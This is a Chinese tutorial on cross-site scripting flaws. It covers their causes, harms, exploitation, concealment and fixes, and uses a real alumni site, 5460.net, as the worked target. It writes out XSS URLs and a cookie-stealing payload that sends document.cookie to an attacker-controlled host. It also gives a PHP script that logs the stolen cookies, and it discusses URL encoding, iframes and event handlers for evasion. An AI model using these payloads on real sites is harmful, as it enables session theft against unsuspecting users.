程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> ASP編程 >> 關於ASP編程 >> 跨站腳本執行漏洞詳解與防護

跨站腳本執行漏洞詳解與防護

編輯:關於ASP編程
本文主要介紹跨站腳本執行漏洞的成因,形式,危害,利用方式,隱藏技巧,解決方法和常見問題 (FAQ),由於目前介紹跨站腳本執行漏洞的資料還不是很多,而且一般也不是很詳細,所以希望本文能夠 比較詳細的介紹該漏洞。由於時間倉促,水平有限,本文可能有不少錯誤,希望大家不吝賜教。 

聲明,請不要利用本文介紹的任何內容,代碼或方法進行破壞,否則一切後果自負! 

【漏洞成因】 
原因很簡單,就是因為CGI程序沒有對用戶提交的變量中的HTML代碼進行過濾或轉換。 

【漏洞形式】 
這裡所說的形式,實際上是指CGI輸入的形式,主要分為兩種: 
1.顯示輸入 
2.隱式輸入 
其中顯示輸入明確要求用戶輸入數據,而隱式輸入則本來並不要求用戶輸入數據,但是用戶卻可以通 過輸入數據來進行干涉。 
顯示輸入又可以分為兩種: 
1. 輸入完成立刻輸出結果 
2. 輸入完成先存儲在文本文件或數據庫中,然後再輸出結果 
注意:後者可能會讓你的網站面目全非!:( 
而隱式輸入除了一些正常的情況外,還可以利用服務器或CGI程序處理錯誤信息的方式來實施。 

【漏洞危害】 
大家最關心的大概就要算這個問題了,下面列舉的可能並不全面,也不系統,但是我想應該是比較典 型的吧。 
1. 獲取其他用戶Cookie中的敏感數據 
2. 屏蔽頁面特定信息 
3. 偽造頁面信息 
4. 拒絕服務攻擊 
5. 突破外網內網不同安全設置 
6. 與其它漏洞結合,修改系統設置,查看系統文件,執行系統命令等 
7. 其它 
一般來說,上面的危害還經常伴隨著頁面變形的情況。而所謂跨站腳本執行漏洞,也就是通過別人的 網站達到攻擊的效果,也就是說,這種攻擊能在一定程度上隱藏身份。 

【利用方式】 
下面我們將通過具體例子來演示上面的各種危害,這樣應該更能說明問題,而且更易於理解。為了條 理更清晰一些,我們將針對每種危害做一個實驗。 
為了做好這些實驗,我們需要一個抓包軟件,我使用的是Iris,當然你可以選擇其它的軟件,比如 NetXray什麼的。至於具體的使用方法,請參考相關幫助或手冊。 
另外,需要明白的一點就是:只要服務器返回用戶提交的信息,就可能存在跨站腳本執行漏洞。 
好的,一切就緒,我們開始做實驗!:) 

實驗一:獲取其他用戶Cookie中的敏感信息 
我們以國內著名的同學錄站點5460.net為例來說明一下,請按照下面的步驟進行: 
1. 進入首頁http://www.5460.net/ 
2. 輸入用戶名“<h1>”,提交,發現服務器返回信息中包含了用戶提交的“<h1>”。 
3. 分析抓包數據,得到實際請求: 
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6 
4. 構造一個提交,目標是能夠顯示用戶Cookie信息: 
http://www.5460.net/txl/login/login.pl?username=<script>alert(document.cookie)</ script>&passwd=&ok.x=28&ok.y=6 
5. 如果上面的請求獲得預期的效果,那麼我們就可以嘗試下面的請求: 
http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6 
其中http://www.notfound.org/info.php是你能夠控制的某台主機上的一個腳本,功能是獲取查詢字符串的信 息,內容如下: 
<?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("info.txt","a"); 
fwrite($fp,$info."/n"); 
fclose($fp); 

header("Location: http://www.5460.net"); 
注:“%2B”為“+”的URL編碼,並且這裡只能用“%2B”,因為“+”將被作為空格處理。後面的header語 句則純粹是為了增加隱蔽性。 
6. 如果上面的URL能夠正確運行的話,下一步就是誘使登陸5460.net的用戶訪問該URL,而我們就可以 獲取該用戶Cookie中的敏感信息。 
7. 後面要做什麼就由你決定吧! 

實驗二:屏蔽頁面特定信息 
我們仍然以5460.net作為例子,下面是一個有問題的CGI程序: 
http://www.5460.net/txl/liuyan/liuyanSql.pl 
該CGI程序接受用戶提供的三個變量,即nId,csId和cName,但是沒有對用戶提交的cName變量進行任何檢 查,而且該CGI程序把cName的值作為輸出頁面的一部分,5460.net的用戶應該都比較清楚留言右下角有你 的名字,對吧? 
既然有了上面的種種條件,我們可以不妨作出下面的結論: 
某個用戶可以“屏蔽”其兩次留言之間的所有留言! 
當然,我們說的“屏蔽”不是“刪除”,用戶的留言還是存在的,只不過由於HTML的特性,我們無法從 頁面看到,當然如果你喜歡查看源代碼的話就沒有什麼用處了,但是出了我們這些研究CGI安全的人來 說,有多少人有事沒事都看HTML源代碼? 
由於種種原因,我在這裡就不公布具體的細節了,大家知道原理就好了。 
注:仔細想想,我們不僅能屏蔽留言,還能匿名留言,Right? 

實驗三:偽造頁面信息 
如果你理解了上面那個實驗,這個實驗就沒有必要做了,基本原理相同,只是實現起來稍微麻煩一點而 已。 

實驗四:拒絕服務攻擊 
現在應該知道,我們在某種程度上可以控制存在跨站腳本執行漏洞的服務器的行為,既然這樣,我們 就可以控制服務器進行某種消耗資源的動作。比如說運行包含死循環或打開無窮多個窗口的JavaScript腳本 等等。這樣訪問該URL的用戶系統就可能因此速度變慢甚至崩潰。同樣,我們也可能在其中嵌入一些腳 本,讓該服務器請求其它服務器上的資源,如果訪問的資源比較消耗資源,並且訪問人數比較多的話,那 麼被訪問的服務器也可能被拒絕服務,而它則認為該拒絕服務攻擊是由訪問它的服務器發起的,這樣就可 以隱藏身份。 

實驗五:突破外網內網不同安全設置 
這個應該很好理解吧,一般來說我們的浏覽器對不同的區域設置了不同的安全級別。舉例來說,對於 Internet區域,可能你不允許JavaScript執行,而在Intranet區域,你就允許JavaScript執行。一般來說,前者的 安全級別都要高於後者。這樣,一般情況下別人無法通過執行惡意JavaScript腳本對你進行攻擊,但是如果 與你處於相同內網的服務器存在跨站腳本執行漏洞,那麼攻擊者就有機可乘了,因為該服務器位於Intranet 區域。 

實驗六:與其它漏洞結合,修改系統設置,查看系統文件,執行系統命令等 
由於與浏覽器相關的漏洞太多了,所以可與跨站腳本執行漏洞一起結合的漏洞也就顯得不少。我想這 些問題大家都應該很清楚吧,前些時間的修改IE標題漏洞,錯誤MIME類型執行命令漏洞,還有多種多樣 的蠕蟲,都是很好的例子。 
更多的例子請參考下列鏈接: 
Internet Explorer Pop-Up OBJECT Tag Bug 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html 
Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html 
MSIE6 can read local files 
http://www.xs4all.nl/~jkuperus/bug.htm 
MSIE may download and run progams automatically 
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html 
File extensions spoofable in MSIE download dialog 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html 
the other IE cookie stealing bug (MS01-055) 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html 
Microsoft Security Bulletin MS01-055 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html 
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing 
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html 
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment 
http://www.kriptopolis.com/cua/eml.html 

跨站腳本執行漏洞在這裡的角色就是隱藏真正攻擊者的身份。 

實驗七:其它 
其實這類問題和跨站腳本執行漏洞沒有多大關系,但是在這裡提一下還是很有必要的。問題的實質還 是CGI程序沒有過濾用戶提交的數據,然後進行了輸出處理。舉個例子來說,支持SSI的服務器上的CGI程 序輸出了用戶提交的數據,無論該數據是采取何種方式輸入,都可能導致SSI指令的執行。當然,這是在服 務端,而不是客戶端執行。其實像ASP,PHP和Perl等CGI語言都可能導致這種問題。 

【隱藏技巧】 
出於時間的考慮,我在這裡將主要講一下理論了,相信不是很難懂,如果實在有問題,那麼去找本書 看吧。 
1. URL編碼 
比較一下: 
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6 
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y=6 
你覺得哪個更有隱蔽性?! 

2. 隱藏在其它對象之下 
與直接給別人一個鏈接相比,你是否決定把該鏈接隱藏在按鈕以下更好些呢? 

3. 嵌入頁面中 
讓別人訪問一個地址(注意這裡的地址不同於上面提到的URL),是不是又要比讓別人按一個按鈕容易得 多,借助於Iframe,你可以把這種攻擊變得更隱蔽。 

4. 合理利用事件 
合理使用事件,在某些情況上可以繞過CGI程序對輸入的限制,比如說前些日子的SecurityFocus的跨站腳本 執行漏洞。 

【注意事項】 
一般情況下直接進行類似<script>alert(document.cookie)</script>之類的攻擊沒有什麼問題,但是有時 CGI程序對用戶的輸入進行了一些處理,比如說包含在''或””之內,這時我們就需要使用一些小技巧 來繞過這些限制。 
如果你對HTML語言比較熟悉的話,繞過這些限制應該不成問題。 

【解決方法】 
要避免受到跨站腳本執行漏洞的攻擊,需要程序員和用戶兩方面共同努力: 
程序員: 
1. 過濾或轉換用戶提交數據中的HTML代碼 
2. 限制用戶提交數據的長度 

用戶: 
1. 不要輕易訪問別人給你的鏈接 
2. 禁止浏覽器運行JavaScript和ActiveX代碼 

附:常見浏覽器修改設置的位置為: 
Internet Explorer: 
工具->Internet選項->安全->Internet->自定義級別 
工具->Internet選項->安全->Intranet->自定義級別 
Opera: 
文件->快速參數->允許使用Java 
文件->快速參數->允許使用插件 
文件->快速參數->允許使用JavaScript 

【常見問題】 
Q:跨站腳本執行漏洞在哪裡存在? 
A:只要是CGI程序,只要允許用戶輸入,就可能存在跨站腳本執行漏洞。 

Q:跨站腳本執行漏洞是不是只能偷別人的Cookie? 
A:當然不是!HTML代碼能做的,跨站腳本執行漏洞基本都能做。 
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved